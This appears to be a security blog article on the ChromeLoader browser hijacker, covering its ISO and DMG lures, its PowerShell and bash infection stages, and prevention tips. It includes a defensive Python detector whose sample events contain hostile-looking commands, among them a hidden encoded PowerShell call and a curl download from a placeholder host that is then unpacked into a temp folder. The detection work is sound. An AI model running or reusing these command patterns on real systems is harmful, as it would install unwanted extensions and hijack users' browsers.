ChromeLoader Browser Malware Being Spread via Pirated Games and QR Codes

There has been a sudden spike in browser hijacking campaigns using ChromeLoader malware.

According to Aedan Russell of Red Canary, new activity has been detected recently: attackers have been hijacking browsers with the “pervasive and persistent” ChromeLoader malware, which modifies browser settings and redirects the user to various advertisements.

Campaigns of this kind are known as malvertising campaigns. They are financially motivated: the attackers are usually associated with a large network of marketing affiliates, so they redirect users to advertising sites.

What Is ChromeLoader?

In case you have no idea what ChromeLoader is, here is a brief overview. ChromeLoader is a malicious extension for the Chrome browser. Its job is to change web browser settings so that the search results shown grab the user’s attention and push them to download unwanted software, visit adult game platforms or dating sites, or take part in fake surveys.

Among browser hijackers, ChromeLoader is notorious for its persistence, its volume (which involves abuse of PowerShell), and its infection route.

How Does ChromeLoader Malware Work?

According to Red Canary’s blog post, the malware operators get into the system with a malicious ISO archive file. They lure users by offering it as a cracked executable for a video game or commercial software, downloadable from suspicious torrents or sites. At times the operators also use Twitter to promote their malicious executables.

On Windows 10 and later, once a user double-clicks the file it is mounted on the device as a virtual CD-ROM drive. Although the file inside may look like a keygen or a game crack with a name such as Fortnite_Installer.exe, executing it unleashes malware that can take over your system.

ChromeLoader executes a PowerShell command that fetches an archive from a remote source and loads the malicious file as a Chrome extension. PowerShell then removes the scheduled task and goes on infecting Chrome, all the while using the malicious extension to manipulate the browser’s search results without your knowledge.

Red Canary researchers believe ChromeLoader operators also target macOS systems, where they manipulate the Chrome and Safari browsers. The infection chain on macOS is similar; however, the attackers use a DMG (Apple Disk Image) file instead of an ISO.

Also, on macOS the installer is a bash script rather than an executable. It downloads the malicious extension and decompresses it into the private/var/temp directory.
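The two infection chains above give a defender a handful of process-level events to look for: a PowerShell stage that fetches the extension and later deletes a scheduled task, a Chrome process started with an unpacked extension from a user-writable location, and on macOS a shell installer writing into private/var/temp. The following is an added example written for this article, not code from Red Canary or the article’s author. It assumes details the article does not state: that the PowerShell stage runs with a hidden window and an encoded command, that the extension is side-loaded with Chrome’s `--load-extension` switch, and that the task is removed with `schtasks /Delete`. The process-creation events, hostnames, task name and URL are all constructed.

```python
"""Detect ChromeLoader-style process activity in process-creation records.

Added example (not from the article or Red Canary). The rule details
(hidden/encoded PowerShell, --load-extension, schtasks /Delete) are
assumptions about how the stages described in the article appear on a
host; the sample events are constructed.
"""
import re
from dataclasses import dataclass
from typing import Callable, List


@dataclass
class ProcEvent:
    host: str
    image: str      # executable name of the new process
    cmdline: str    # full command line as logged by the EDR/Sysmon


@dataclass
class Finding:
    host: str
    rule: str
    cmdline: str


# Locations a dropper writes to; an extension loaded from here did not
# come through the Chrome Web Store (constructed list of patterns).
USER_WRITABLE = re.compile(
    r"(\\appdata\\local\\temp\\|\\users\\[^\\]+\\appdata\\|private/var/temp/|^/tmp/)",
    re.I,
)


def check_powershell(ev: ProcEvent) -> List[Finding]:
    """Hidden-window + encoded command, and scheduled-task deletion (assumed stage markers)."""
    out: List[Finding] = []
    if not ev.image.lower().startswith("powershell"):
        return out
    cl = ev.cmdline.lower()
    hidden = re.search(r"-w(indowstyle)?\s+hidden", cl) is not None
    encoded = re.search(r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{40,}", cl) is not None
    if hidden and encoded:
        out.append(Finding(ev.host, "powershell_hidden_encoded", ev.cmdline))
    if "schtasks" in cl and "/delete" in cl:
        out.append(Finding(ev.host, "scheduled_task_deleted", ev.cmdline))
    return out


def check_chrome(ev: ProcEvent) -> List[Finding]:
    """Chrome started with an unpacked extension from a user-writable path (assumed loader method)."""
    if ev.image.lower() not in ("chrome.exe", "google chrome", "chrome"):
        return []
    m = re.search(r'--load-extension=("?)([^"\s]+)', ev.cmdline, re.I)
    if m and USER_WRITABLE.search(m.group(2)):
        return [Finding(ev.host, "chrome_sideloaded_extension", ev.cmdline)]
    return []


def check_macos_installer(ev: ProcEvent) -> List[Finding]:
    """Shell installer downloading/unpacking into private/var/temp, as the article describes."""
    if ev.image.lower() not in ("bash", "sh", "zsh"):
        return []
    cl = ev.cmdline.lower()
    if "private/var/temp" in cl and any(t in cl for t in ("curl", "tar ", "unzip")):
        return [Finding(ev.host, "shell_installer_writes_var_temp", ev.cmdline)]
    return []


RULES: List[Callable[[ProcEvent], List[Finding]]] = [
    check_powershell, check_chrome, check_macos_installer,
]


def scan(events: List[ProcEvent]) -> List[Finding]:
    """Run every rule over every event and return all findings in event order."""
    findings: List[Finding] = []
    for ev in events:
        for rule in RULES:
            findings.extend(rule(ev))
    return findings


# Constructed sample events: four malicious stages, then two benign processes.
# The base64 blob is a placeholder string, not an actual payload.
SAMPLE_EVENTS = [
    ProcEvent("WS01", "powershell.exe",
              "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand "
              + "UGxhY2Vob2xkZXJQYXlsb2Fk" * 2),
    ProcEvent("WS01", "powershell.exe",
              'powershell.exe -NoProfile -Command "schtasks /Delete /TN ChromeTask /F"'),
    ProcEvent("WS01", "chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
              r'--load-extension="C:\Users\alice\AppData\Local\Temp\ext_unpacked" --restore-last-session'),
    ProcEvent("MAC01", "bash",
              '/bin/bash -c "curl -s http://example.invalid/ext.tgz -o /private/var/temp/ext.tgz '
              '&& tar -xzf /private/var/temp/ext.tgz -C /private/var/temp"'),
    ProcEvent("WS02", "chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'),
    ProcEvent("WS02", "powershell.exe", "powershell.exe -NoProfile -Command Get-Process"),
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host}: {f.rule}: {f.cmdline}")
```

Each rule on its own is noisy (administrators delete scheduled tasks, developers load unpacked extensions), so in practice you would correlate the findings per host and over a short time window; the scan here returns them in event order so that correlation can be layered on top.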

Adware and Browser Hijacker Examples

ChromeLoader combines adware and browser-hijacker capabilities. Typical browser-hijacker programs do not use techniques as sophisticated as ChromeLoader’s (and, as a result of that sophistication, the malware could gain additional malicious features such as spying and data theft).

Here are a few examples of browser hijackers that we’ve encountered and analyzed:

  • To Go Web
  • Keep Secure Search
  • Tap togo

We also analyzed the following adware:

  • Fake Google Translate extension
  • Files Download Now
  • Down Assist

Regardless of how a malicious program behaves, as long as it is on the system it greatly endangers the device and its user. That is why it must be removed as soon as it is detected.

How to Avoid Installing Malware?

You must exercise caution when browsing or downloading content. You never know when you are being lured into downloading something harmful onto your device, even if it appears completely harmless. It is best to download software only from authentic and official sources.

Furthermore, keep your software activated and updated, and use only the tools provided by genuine developers. Software acquired from third parties can put you in jeopardy, as it may contain malware.

Another precaution is to handle incoming mail with care. Messages that look suspicious or irrelevant should not be opened, since you do not want them to lead to a system failure. An antivirus is equally important and must be kept updated. Regular checks of your system can warn you of potential threats early enough for you to deal with them in time.

As long as you keep yourself on guard, you should be able to keep your system safe.